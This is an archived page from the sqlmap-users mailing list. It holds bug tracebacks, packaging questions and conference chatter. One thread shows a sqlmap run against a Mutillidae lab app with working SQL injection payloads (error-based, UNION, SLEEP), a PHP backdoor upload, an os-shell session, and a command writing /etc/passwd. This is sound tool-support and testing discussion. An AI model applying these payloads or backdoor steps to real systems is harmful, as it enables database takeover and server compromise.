sqlmap-users Mailing List for sqlmap (Page 87)
Brought to you by: inquisb
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-08 09:14:28

Hi Chris,

This is fixed now, but there's another bug I introduced recently. I will fix that as soon as possible.

Thanks for reporting.

Bernardo

On 7 July 2011 21:44, Chris Clements <ccl...@fl...> wrote:
> [15:37:17] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4224), retry
> your run with the latest development version from the Subversion
> repository. If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the
> bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4224)
> Python version: 2.6.5
> Operating system: posix
> Command line: ./sqlmap.py --batch --eta --os-shell --priv-esc --dump-all --forms -o -u **********************************************
> Technique: None
> Back-end DBMS: Microsoft Access (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 86, in main
>     start()
>   File "/pentest/database/sqlmap/lib/controller/controller.py", line 552, in start
>     action()
>   File "/pentest/database/sqlmap/lib/controller/action.py", line 112, in action
>     conf.dbmsHandler.dumpAll()
>   File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 1781, in dumpAll
>     self.getTables()
>   File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 806, in getTables
>     tables = self.getTables(False)
>   File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 867, in getTables
>     query = rootQuery.inband.query
> AttributeError: 'DictObject' object has no attribute 'inband'
>
> [*] shutting down at 15:37:17
>
> Chris
>
> ------------------------------------------------------------------------------
> All of the data generated in your IT infrastructure is seriously valuable.
> Why? It contains a definitive record of application performance, security
> threats, fraudulent activity, and more. Splunk takes this data and makes
> sense of it. IT sense. And common sense.
> http://p.sf.net/sfu/splunk-d2d-c2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
From: RS <li...@gm...> - 2011-07-08 08:40:42

./sqlmap.py -u "http://www.modsecurity.org/zero.webappsecurity.com/login1.asp" --data "login=&password=&graphicOption=minimum" --parse-errors -v 3 --random-agent --level 5 --risk 3 --batch --dbms "Microsoft Access" --tables

sqlmap version: 1.0-dev (r4224)
Python version: 2.6.5
Operating system: posix
Command line: ./sqlmap.py -u ************************************************************* --data login=&password=&graphicOption=minimum --parse-errors -v 3 --random-agent --level 5 --risk 3 --batch --dbms Microsoft Access --tables
Technique: None
Back-end DBMS: Microsoft Access (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 86, in main
    start()
  File "/test/sqlmap-dev/lib/controller/controller.py", line 552, in start
    action()
  File "/test/sqlmap-dev/lib/controller/action.py", line 91, in action
    conf.dumper.dbTables(conf.dbmsHandler.getTables())
  File "/test/sqlmap-dev/plugins/generic/enumeration.py", line 806, in getTables
    tables = self.getTables(False)
  File "/test/sqlmap-dev/plugins/generic/enumeration.py", line 867, in getTables
    query = rootQuery.inband.query
AttributeError: 'DictObject' object has no attribute 'inband'

[*] shutting down at 01:39:31

The problem happens with --tables, --columns, --common-tables
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-08 08:31:24

Hi Wil, Chris,

On 8 July 2011 09:28, Chris Oakley <chr...@gm...> wrote:
> ...
> For the 0.8 exe, I assume the guys used something like py2exe. Maybe they
> could do this with 0.9 stable too if you ask nicely.

Indeed, we used py2exe to generate the executable. It is not supported any more, now we only release .tar.gz and .tar.bz2. However, anyone is welcome to take over the maintenance of the RPM, DEB and EXE packages, just drop us an email if you are interested.

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
From: Chris O. <chr...@gm...> - 2011-07-08 08:28:08

I use the 1.0-dev version every day on Windows and Linux :)

The best way is to install Python, whack it in your system PATH so that you can access it from anywhere, install TortoiseSVN and grab the latest build from https://svn.sqlmap.org/sqlmap/trunk/sqlmap. If you don't want to do this then just install Python and use the 0.9 stable build. Python is cross platform.

For the 0.8 exe, I assume the guys used something like py2exe. Maybe they could do this with 0.9 stable too if you ask nicely.

Chris

On 8 July 2011 03:33, Wil Ruiz <wil...@gm...> wrote:
> I'm interested in running this on Windows. Version 0.8 had a Windows
> executable using Cygwin. Is this still possible with 0.9 or has Windows
> support been dropped? Thank you!
From: Wil R. <wil...@gm...> - 2011-07-08 02:33:17

I'm interested in running this on Windows. Version 0.8 had a Windows executable using Cygwin. Is this still possible with 0.9 or has Windows support been dropped? Thank you!
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-07 22:12:42

Hi,

Over a year ago I registered the #sqlmap IRC channel on Freenode and forgot about it. Now I decided to use it, so if you happen to be on Freenode, feel free to join in for a chat. Technical questions, brainstorming, bug reports, feature requests are always welcome. Keep them coming, now you have also the IRC vector to exploit! I welcome private messages (/query inquis) too and will try to be in there as much as time permits.

/server irc.freenode.net
/join #sqlmap

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
From: Chris C. <ccl...@fl...> - 2011-07-07 20:45:10

[15:37:17] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4224), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4224)
Python version: 2.6.5
Operating system: posix
Command line: ./sqlmap.py --batch --eta --os-shell --priv-esc --dump-all --forms -o -u **********************************************
Technique: None
Back-end DBMS: Microsoft Access (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 86, in main
    start()
  File "/pentest/database/sqlmap/lib/controller/controller.py", line 552, in start
    action()
  File "/pentest/database/sqlmap/lib/controller/action.py", line 112, in action
    conf.dbmsHandler.dumpAll()
  File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 1781, in dumpAll
    self.getTables()
  File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 806, in getTables
    tables = self.getTables(False)
  File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 867, in getTables
    query = rootQuery.inband.query
AttributeError: 'DictObject' object has no attribute 'inband'

[*] shutting down at 15:37:17

Chris
From: Chris O. <chr...@gm...> - 2011-07-07 20:16:19

Hi Bernardo

Thanks! I've just downloaded it, there are seeds. I'll keep it seeded.

Regards
Chris

On 7 July 2011 20:51, Bernardo Damele A. G. <ber...@gm...> wrote:
> Hi,
>
> The video is available now via torrent,
> http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python/video?torrent=1
> I can't see any seeders at the moment and am waiting myself to download it.
>
> Bernardo
>
> On 7 July 2011 20:48, Chris Oakley <chr...@gm...> wrote:
> > Did the video to this ever make it online? Chris
> >
> > On 26 June 2011 15:07, Bernardo Damele A. G. <ber...@gm...> wrote:
> >> Slides from EuroPython presentation are online, http://t.co/wRPlSIf.
> >> Soon to follow the video recording!
> >>
> >> Congratulations Miroslav!
> >>
> >> B.
> >>
> >> On 22 June 2011 17:46, Kurt Grutzmacher <gr...@ji...> wrote:
> >> > There's a reason why our grandparents used to dip their fingers in the
> >> > whiskey glass when our parents were teething.
> >> > Alcohol calms all.
> >> > --
> >> > Kurt Grutzmacher -=- gr...@ji...
> >> >
> >> > On Wed, Jun 22, 2011 at 9:18 AM, Miroslav Stampar <mir...@gm...> wrote:
> >> >> it seems that i'll need to drink 2 beers before
> >> >>
> >> >> if you see me "probably" drunk you'll know i am :)
> >> >>
> >> >> kr
> >> >>
> >> >> On Wed, Jun 22, 2011 at 6:16 PM, Ahmed Shawky <ah...@is...> wrote:
> >> >> > /me gonna record it and spread it all of the interwebs :D
> >> >> >
> >> >> > On Wed, Jun 22, 2011 at 6:15 PM, Miroslav Stampar <mir...@gm...> wrote:
> >> >> >> ok people.
> >> >> >>
> >> >> >> this is my first conference and i am not the best narrator there is
> >> >> >> in the universe.
> >> >> >>
> >> >> >> i'll kill myself if it will be "streamed" :)
> >> >> >>
> >> >> >> kr
> >> >> >>
> >> >> >> On Wed, Jun 22, 2011 at 6:13 PM, Chris Oakley <chr...@gm...> wrote:
> >> >> >> > If it is, be sure to point us in the right direction afterwards :)
> >> >> >> >
> >> >> >> > On 22 June 2011 17:11, Ahmed Shawky <ah...@is...> wrote:
> >> >> >> >> will it be streamed live ?
> >> >> >> >>
> >> >> >> >> On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. <ber...@gm...> wrote:
> >> >> >> >>> Hi,
> >> >> >> >>>
> >> >> >> >>> Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at EuroPython
> >> >> >> >>> 2011 conference in Firenze, Italy.
> >> >> >> >>>
> >> >> >> >>> The talk is titled "sqlmap - security development in python".
> >> >> >> >>>
> >> >> >> >>> Abstract follows:
> >> >> >> >>> """
> >> >> >> >>> The "sqlmap" is one of the largest, widely used and most active Python
> >> >> >> >>> projects in the IT security community (more than 2000 commits in one
> >> >> >> >>> year period with community of over 100 active testers). It combines
> >> >> >> >>> its developers' strong security knowledge together with analytical,
> >> >> >> >>> mathematical and Python development skills to provide IT professionals
> >> >> >> >>> with vibrant features.
> >> >> >> >>>
> >> >> >> >>> Talk would be consisted of several parts: short introduction to
> >> >> >> >>> project and developers, developing and testing environment,
> >> >> >> >>> programming cycle, program's workflow, technologies used, common
> >> >> >> >>> pitfalls and how we've circumvent them, usage of mathematical models,
> >> >> >> >>> optimizations, project's future goals.
> >> >> >> >>>
> >> >> >> >>> The significant part of this talk would be the immediate insight into
> >> >> >> >>> the developing process of probably the world's most advanced
> >> >> >> >>> open-source Python IT security project today.
> >> >> >> >>> """
> >> >> >> >>>
> >> >> >> >>> Reference:
> >> >> >> >>> http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python.
> >> >> >> >>>
> >> >> >> >>> Don't miss it if you are there, it will be a blast! :)
> >> >> >> >>>
> >> >> >> >>> Good luck Miroslav,
> >> >> >> >>> Bernardo
> >> >> >> >>>
> >> >> >> >>> --
> >> >> >> >>> Bernardo Damele A. G.
> >> >> >> >>>
> >> >> >> >>> E-mail / Jabber: bernardo.damele (at) gmail.com
> >> >> >> >>> Mobile: +447788962949 (UK 07788962949)
> >> >> >> >>> PGP Key ID: Unavailable
> >> >> >> >>>
> >> >> >> >>> ------------------------------------------------------------------------------
> >> >> >> >>> Simplify data backup and recovery for your virtual environment with
> >> >> >> >>> vRanger.
> >> >> >> >>> Installation's a snap, and flexible recovery options mean your data is
> >> >> >> >>> safe, secure and there when you need it. Data protection magic?
> >> >> >> >>> Nope - It's vRanger. Get your free trial download today.
> >> >> >> >>> http://p.sf.net/sfu/quest-sfdev2dev
> >> >> >> >>> _______________________________________________
> >> >> >> >>> sqlmap-users mailing list
> >> >> >> >>> sql...@li...
> >> >> >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >> >> >> >>
> >> >> >> >> --
> >> >> >> >> Ahmed Shawky El-Antry
> >> >> >> >> Pen-tester, Programmer and System administrator
> >> >> >> >> lnxg33k owner "http://lnxg33k.wordpress.com"
> >> >> >> >> Isecur1ty team member "http://www.isecur1ty.org"
> >> >> >> >> Twitter @lnxg33k
> >> >> >>
> >> >> >> --
> >> >> >> Miroslav Stampar (@stamparm)
> >> >> >>
> >> >> >> E-mail: miroslav.stampar (at) gmail.com
> >> >> >> PGP Key ID: 0xB5397B1B
> >>
> >> --
> >> Bernardo Damele A. G.
> >>
> >> E-mail / Jabber: bernardo.damele (at) gmail.com
> >> Mobile: +447788962949 (UK 07788962949)
> >> PGP Key ID: Unavailable
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-07 19:52:00

Hi,

The video is available now via torrent,
http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python/video?torrent=1
I can't see any seeders at the moment and am waiting myself to download it.

Bernardo

On 7 July 2011 20:48, Chris Oakley <chr...@gm...> wrote:
> Did the video to this ever make it online? Chris
>
> On 26 June 2011 15:07, Bernardo Damele A. G. <ber...@gm...> wrote:
>> Slides from EuroPython presentation are online, http://t.co/wRPlSIf.
>> Soon to follow the video recording!
>>
>> Congratulations Miroslav!
>>
>> B.

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
From: Chris O. <chr...@gm...> - 2011-07-07 19:48:45
|
Did the video to this ever make it online? Chris On 26 June 2011 15:07, Bernardo Damele A. G. <ber...@gm...>wrote: > Slides from EuroPython presentation are online, http://t.co/wRPlSIf. > Soon to follow the video recording! > > Congratulations Miroslav! > > B. > > > On 22 June 2011 17:46, Kurt Grutzmacher <gr...@ji...> wrote: > > There's a reason why our grandparents used to dip their fingers in the > > whiskey glass when our parents were teething. > > Alcohol calms all. > > -- > > Kurt Grutzmacher -=- gr...@ji... > > > > > > On Wed, Jun 22, 2011 at 9:18 AM, Miroslav Stampar > > <mir...@gm...> wrote: > >> > >> it seems that i'll need to drink 2 beers before > >> > >> if you see me "probably" drunk you'll know i am :) > >> > >> kr > >> > >> On Wed, Jun 22, 2011 at 6:16 PM, Ahmed Shawky <ah...@is...> > wrote: > >> > /me gonna record it and spread it all of the interwebs :D > >> > > >> > On Wed, Jun 22, 2011 at 6:15 PM, Miroslav Stampar > >> > <mir...@gm...> wrote: > >> >> > >> >> ok people. > >> >> > >> >> this is my first conference and i am not the best narrator there is > in > >> >> the universe. > >> >> > >> >> i'll kill myself if it will be "streamed" :) > >> >> > >> >> kr > >> >> > >> >> On Wed, Jun 22, 2011 at 6:13 PM, Chris Oakley > >> >> <chr...@gm...> wrote: > >> >> > If it is, be sure to point us in the right direction afterwards :) > >> >> > > >> >> > On 22 June 2011 17:11, Ahmed Shawky <ah...@is...> wrote: > >> >> >> > >> >> >> will it be streamed live ? > >> >> >> > >> >> >> On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. > >> >> >> <ber...@gm...> wrote: > >> >> >>> > >> >> >>> Hi, > >> >> >>> > >> >> >>> Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at > EuroPython > >> >> >>> 2011 conference in Firenze, Italy. > >> >> >>> > >> >> >>> The talk is titled "sqlmap - security development in python". 
> >> >> >>> > >> >> >>> Abstract follows: > >> >> >>> """ > >> >> >>> The "sqlmap" is one of the largest, widely used and most active > >> >> >>> Python > >> >> >>> projects in the IT security community (more than 2000 commits in > >> >> >>> one > >> >> >>> year period with community of over 100 active testers). It > combines > >> >> >>> its developers' strong security knowledge together with > analytical, > >> >> >>> mathematical and Python development skills to provide IT > >> >> >>> professionals > >> >> >>> with vibrant features. > >> >> >>> > >> >> >>> Talk would be consisted of several parts: short introduction to > >> >> >>> project and developers, developing and testing environment, > >> >> >>> programming cycle, program's workflow, technologies used, common > >> >> >>> pitfalls and how we've circumvent them, usage of mathematical > >> >> >>> models, > >> >> >>> optimizations, project's future goals. > >> >> >>> > >> >> >>> The significant part of this talk would be the immediate insight > >> >> >>> into > >> >> >>> the developing process of probably the world's most advanced > >> >> >>> open-source Python IT security project today. > >> >> >>> """ > >> >> >>> > >> >> >>> Reference: > >> >> >>> > >> >> >>> > >> >> >>> > http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python > . > >> >> >>> > >> >> >>> Don't miss it if you are there, it will be a blast! :) > >> >> >>> > >> >> >>> Good luck Miroslav, > >> >> >>> Bernardo > >> >> >>> > >> >> >>> > >> >> >>> -- > >> >> >>> Bernardo Damele A. G. > >> >> >>> > >> >> >>> E-mail / Jabber: bernardo.damele (at) gmail.com > >> >> >>> Mobile: +447788962949 (UK 07788962949) > >> >> >>> PGP Key ID: Unavailable > >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> > ------------------------------------------------------------------------------ > >> >> >>> Simplify data backup and recovery for your virtual environment > with > >> >> >>> vRanger. 
> >> >> >>> Installation's a snap, and flexible recovery options mean your > data > >> >> >>> is > >> >> >>> safe, > >> >> >>> secure and there when you need it. Data protection magic? > >> >> >>> Nope - It's vRanger. Get your free trial download today. > >> >> >>> http://p.sf.net/sfu/quest-sfdev2dev > >> >> >>> _______________________________________________ > >> >> >>> sqlmap-users mailing list > >> >> >>> sql...@li... > >> >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> >> > >> >> >> > >> >> >> > >> >> >> -- > >> >> >> > >> >> >> Ahmed Shawky El-Antry > >> >> >> Pen-tester, Programmer and System administrator > >> >> >> lnxg33k owner "http://lnxg33k.wordpress.com" > >> >> >> Isecur1ty team member"http://www.isecur1ty.org" > >> >> >> Twitter @lnxg33k > >> >> >> > >> >> >> > >> >> >> > >> >> >> > >> >> >> > ------------------------------------------------------------------------------ > >> >> >> Simplify data backup and recovery for your virtual environment > with > >> >> >> vRanger. > >> >> >> Installation's a snap, and flexible recovery options mean your > data > >> >> >> is > >> >> >> safe, > >> >> >> secure and there when you need it. Data protection magic? > >> >> >> Nope - It's vRanger. Get your free trial download today. > >> >> >> http://p.sf.net/sfu/quest-sfdev2dev > >> >> >> _______________________________________________ > >> >> >> sqlmap-users mailing list > >> >> >> sql...@li... > >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> >> > >> >> > > >> >> > > >> >> > > >> >> > > >> >> > > ------------------------------------------------------------------------------ > >> >> > Simplify data backup and recovery for your virtual environment with > >> >> > vRanger. > >> >> > Installation's a snap, and flexible recovery options mean your data > >> >> > is > >> >> > safe, > >> >> > secure and there when you need it. Data protection magic? > >> >> > Nope - It's vRanger. Get your free trial download today. 
> >> >> > http://p.sf.net/sfu/quest-sfdev2dev > >> >> > _______________________________________________ > >> >> > sqlmap-users mailing list > >> >> > sql...@li... > >> >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> > > >> >> > > >> >> > >> >> > >> >> > >> >> -- > >> >> Miroslav Stampar (@stamparm) > >> >> > >> >> E-mail: miroslav.stampar (at) gmail.com > >> >> PGP Key ID: 0xB5397B1B > >> > > >> > > >> > > >> > -- > >> > > >> > Ahmed Shawky El-Antry > >> > Pen-tester, Programmer and System administrator > >> > lnxg33k owner "http://lnxg33k.wordpress.com" > >> > Isecur1ty team member"http://www.isecur1ty.org" > >> > Twitter @lnxg33k > >> > > >> > >> > >> > >> -- > >> Miroslav Stampar (@stamparm) > >> > >> E-mail: miroslav.stampar (at) gmail.com > >> PGP Key ID: 0xB5397B1B > >> > >> > >> > ------------------------------------------------------------------------------ > >> Simplify data backup and recovery for your virtual environment with > >> vRanger. > >> Installation's a snap, and flexible recovery options mean your data is > >> safe, > >> secure and there when you need it. Data protection magic? > >> Nope - It's vRanger. Get your free trial download today. > >> http://p.sf.net/sfu/quest-sfdev2dev > >> _______________________________________________ > >> sqlmap-users mailing list > >> sql...@li... > >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. 
> http://p.sf.net/sfu/splunk-d2d-c2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-07 10:39:23
Hi Chris,

Please provide sqlmap with:

--data "view_user_name=admin&password=adminpass&Submit_button=Submit"

By invalid I mean a view_user_name (perhaps in your version of mutillidae it's called username) value which is accepted, as well as a valid password in this case.

Cheers,
Bernardo

On 7 July 2011 11:37, Chris Oakley <chr...@gm...> wrote:
> Hi Bernardo
>
> I'm not sure what you mean when you say that the POST parameters are
> invalid. I tried the following:
>
> C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/muti
> llidae/index.php?page=user-info.php" --data "username=foo&password=bar
> &user-info-php-submit-button=View+Account+details" -p "username" --os-shell
>
> and the following occurs:
>
> [11:31:47] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.5, Apache 2.2.17
> back-end DBMS: MySQL 5.0
> [11:31:47] [INFO] going to use a web backdoor for command prompt
> [11:31:47] [INFO] fingerprinting the back-end DBMS operating system
> [11:31:48] [INFO] the back-end DBMS operating system is Windows
> [11:31:48] [INFO] trying to upload the file stager
> which web application language does the web server support?
> [1] ASP
> [2] ASPX
> [3] PHP (default)
> [4] JSP
>>
> [11:31:49] [WARNING] unable to retrieve the web server document root
> please provide the web server document root [C:/xampp/htdocs/,C:/Inetp
> ub/wwwroot/]: C:\wamp\www\mutillidae
> [11:32:01] [WARNING] unable to retrieve any web server path
> please provide any additional web server full path to try to upload th
> e agent [Enter for None]: C:\wamp\www\mutillidae
> [11:32:07] [WARNING] unable to upload the file stager on 'C:/wamp/www/
> mutillidae'
> [11:32:08] [WARNING] unable to upload the file stager on 'C:/wamp/www/
> mutillidae/mutillidae'
> [11:32:08] [WARNING] HTTP error codes detected during testing:
> 404 (Not Found) - 2 times
> [11:32:08] [INFO] Fetched data logged to text files under 'C:\Program
> Files\sqlmap-0.9\output\localhost'
>
> [*] shutting down at 11:32:08
>
> Could it be to do with:
>
> [11:31:49] [WARNING] unable to retrieve the web server document root
> please provide the web server document root [C:/xampp/htdocs/,C:/Inetp
> ub/wwwroot/]: C:\wamp\www\mutillidae
> [11:32:01] [WARNING] unable to retrieve any web server path
> please provide any additional web server full path to try to upload th
> e agent [Enter for None]: C:\wamp\www\mutillidae
>
> Regards
>
> Chris
>
> On 6 July 2011 23:52, Bernardo Damele A. G. <ber...@gm...>
> wrote:
>>
>> Hi Chris,
>>
>> No worries.
>> If you want command execution, sqlmap can handle it automatically also
>> when it's MySQL and you've got a writable folder within the document
>> root, --os-cmd and --os-shell. Also, --os-pwn can work in this
>> scenario too.
>> The file stager uploaded is 0KB because you provide invalid values to
>> the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to
>> upload the file stager against MySQL.
>> >> See: >> --8<-- >> $ python sqlmap.py -u >> "http://debian32/mutillidae/index.php?page=user-info.php" --data >> "view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1 >> --os-shell --flush-session >> >> sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover >> tool >> http://sqlmap.sourceforge.net >> >> [!] legal disclaimer: usage of sqlmap for attacking targets without >> prior mutual consent is illegal. It is the end user's responsibility >> to obey all applicable local, state and federal laws. Authors assume >> no liability and are not responsible for any misuse or damage caused >> by this program >> >> [*] starting at 23:49:52 >> >> [23:49:52] [INFO] setting file for logging HTTP traffic >> [23:49:52] [INFO] using >> >> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' >> as session file >> [23:49:52] [INFO] flushing session file >> [23:49:52] [INFO] testing connection to the target url >> [23:49:52] [INFO] heuristics detected web page charset 'ascii' >> [23:49:52] [INFO] testing if the url is stable, wait a few seconds >> [23:49:53] [INFO] url is stable >> [23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic >> [23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not >> dynamic >> [23:49:53] [INFO] heuristic test shows that POST parameter >> 'view_user_name' might be injectable (possible DBMS: MySQL) >> [23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name' >> [23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >> clause' >> [23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or >> HAVING clause' >> [23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND >> error-based - WHERE or HAVING clause' injectable >> [23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> [23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 
5.0.11 >> AND time-based blind' injectable >> [23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> [23:50:04] [INFO] target url appears to be UNION injectable with 4 columns >> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION >> query (NULL) - 1 to 10 columns' injectable >> POST parameter 'view_user_name' is vulnerable. Do you want to keep >> testing the others? [y/N] >> sqlmap identified the following injection points with a total of 30 >> HTTP(s) requests: >> --- >> Place: POST >> Parameter: view_user_name >> Type: error-based >> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause >> Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT >> COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033) >> THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM >> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND >> 'ekpw'='ekpw&password=adminpass&Submit_button=Submit >> >> Type: UNION query >> Title: MySQL UNION query (NULL) - 1 to 10 columns >> Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL, >> >> CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113) >> AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND >> 'TOwv'='TOwv&password=adminpass&Submit_button=Submit >> >> Type: AND/OR time-based blind >> Title: MySQL > 5.0.11 AND time-based blind >> Payload: view_user_name=admin' AND SLEEP(5) AND >> 'BfoH'='BfoH&password=adminpass&Submit_button=Submit >> --- >> >> [23:51:31] [INFO] the back-end DBMS is MySQL >> >> web application technology: PHP 5.2.6, Apache 2.2.9 >> back-end DBMS: MySQL 5.0 >> [23:51:31] [INFO] going to use a web backdoor for command prompt >> [23:51:31] [INFO] fingerprinting the back-end DBMS operating system >> [23:51:31] [INFO] the back-end DBMS operating system is Linux >> [23:51:31] [INFO] trying to upload the file stager >> which web application language does the web server support? 
>> [1] ASP >> [2] ASPX >> [3] PHP (default) >> [4] JSP >> > >> [23:51:32] [WARNING] unable to retrieve the web server document root >> please provide the web server document root [/var/www/]: >> [23:51:32] [WARNING] unable to retrieve any web server path >> please provide any additional web server full path to try to upload >> the agent [Enter for None]: /var/www/test >> [23:51:35] [WARNING] unable to upload the file stager on '/var/www' >> [23:51:35] [INFO] the file stager has been successfully uploaded on >> '/var/www/test' - http://debian32:80/test/tmpugbmo.php >> [23:51:35] [INFO] the backdoor has probably been successfully uploaded >> on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php >> [23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press >> ENTER >> os-shell> id >> do you want to retrieve the command standard output? [Y/n/a] >> command standard output: 'uid=33(www-data) gid=33(www-data) >> groups=33(www-data)' >> >> os-shell> pwd >> do you want to retrieve the command standard output? [Y/n/a] >> command standard output: '/var/www/test' >> >> os-shell> exit >> [23:51:44] [WARNING] HTTP error codes detected during testing: >> 404 (Not Found) - 1 times >> [23:51:44] [INFO] Fetched data logged to text files under >> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32' >> >> [*] shutting down at 23:51:44 >> --8<-- >> >> Cheers, >> Bernardo >> >> >> On 6 July 2011 23:46, <chr...@gm...> wrote: >> > Hi >> > >> > Thanks. It turns out I was being an idiot. With absolute paths I didn't >> > realise that this also includes the destination file name. With that >> > included, it works like a dream. >> > >> > What I haven't managed to get going properly yet is the --os-cmd flag. >> > The temp stager file does appear, but is empty, 0KB. However; I think I'll >> > save that one for another day! >> > >> > Regards >> > >> > Chris >> > ------------------ >> > >> > -----Original Message----- >> > From: "Bernardo Damele A. G." 
<ber...@gm...> >> > Date: Wed, 6 Jul 2011 23:42:22 >> > To: Chris Oakley<chr...@gm...> >> > Cc: <sql...@li...> >> > Subject: Re: [sqlmap-users] File Writing >> > >> > Hi Chris, >> > >> > To me it works well: >> > --8<-- >> > $ python sqlmap.py -u >> > "http://debian32/mutillidae/index.php?page=user-info.php" --forms -p >> > view_user_name --risk 3 --level 3 --parse-errors --file-write >> > /etc/passwd --file-dest /tmp/test --flush-session >> > >> > sqlmap/1.0-dev (r4217) - automatic SQL injection and database >> > takeover tool >> > http://sqlmap.sourceforge.net >> > >> > [!] legal disclaimer: usage of sqlmap for attacking targets without >> > prior mutual consent is illegal. It is the end user's responsibility >> > to obey all applicable local, state and federal laws. Authors assume >> > no liability and are not responsible for any misuse or damage caused >> > by this program >> > >> > [*] starting at 23:26:35 >> > >> > [23:26:35] [INFO] setting file for logging HTTP traffic >> > [23:26:35] [INFO] testing connection to the target url >> > [23:26:35] [INFO] heuristics detected web page charset 'ascii' >> > [23:26:35] [INFO] searching for forms >> > [#1] form: >> > POST http://debian32:80/mutillidae/index.php?page=user-info.php >> > POST data: view_user_name=&password=&Submit_button=Submit >> > do you want to test this form? [Y/n/q] >> >> >> > Edit POST data [default: >> > view_user_name=&password=&Submit_button=Submit] (Warning: blank fields >> > detected): >> > do you want to fill blank fields with random values? 
